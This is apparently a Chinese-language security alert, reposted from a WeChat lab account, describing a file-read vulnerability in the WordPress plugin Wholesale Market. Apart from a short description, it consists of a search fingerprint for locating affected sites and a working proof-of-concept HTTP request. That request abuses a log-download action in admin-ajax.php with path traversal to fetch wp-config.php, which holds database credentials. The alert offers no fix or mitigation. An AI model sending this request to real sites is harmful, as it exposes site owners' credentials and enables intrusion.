0x02 漏洞描述
WordPress plugin Wholesale Market 是一个woocommerce扩展插件,使您的商店能够创建批发用户,并通过设置产品的批发价格。wordpress wholesale market 存在文件读取漏洞。
0x03 漏洞复现
body="wp-content/plugins/wholesale-market"
1.执行poc进行文件读取,得到结果
GET
/
wp-admin
/
admin-ajax
.php
?
action
=
ced_cwsm_csv_import_export_module_download_error_log
&
tab
=
ced_cwsm_plugin
&
section
=
ced_cwsm_csv_import_export_module
&
ced_cwsm_log_download
=../../../
wp-config
.php
HTTP
/1
.1
Host
:
User-Agent
:
Mozilla
/5
.0
Connection
:
close
Accept-Encoding
:
gzip
原文始发于微信公众号(融云攻防实验室):漏洞预警 wordpress wholesale market 文件读取漏洞(未公布)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论